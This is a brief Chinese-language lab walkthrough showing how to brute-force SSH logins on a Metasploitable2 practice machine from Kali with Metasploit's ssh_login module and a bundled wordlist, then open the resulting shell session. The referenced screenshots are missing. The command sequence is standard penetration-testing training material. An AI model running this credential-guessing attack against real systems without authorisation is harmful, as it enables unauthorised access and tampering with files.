靶机:metasploitable2
靶机IP:192.168.88.137
初始密码是:msfadmin/msfadmin
kali安装的镜像为:kali-linux-2019.1a-amd64.iso
KaliIP为:192.168.88.132
进入Metasploit的控制台执行命令:
msfconsole
查询ssh服务相关模块信息,选择如下模块:
use auxiliary/scanner/ssh/ssh_login
查看ssh_login配置参数选项:
show options
设置远程服务RHOSTS参数值:
set RHOSTS 192.168.88.137
设置USERPASS_FILE参数,本文使用系统本身提供的:
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
执行攻击命令:
exploit
上述操作截图如下:
退出攻击,CTRL+C,查看会话列表:sessions -l
进入指定会话:sessions -i 1,进入到会话1,执行shell命令如下截图:
上述操作时通过,ssh_login模块获取到靶机的ssh会话信息,通过会话可以操作靶机上的信息,删除创建文件等。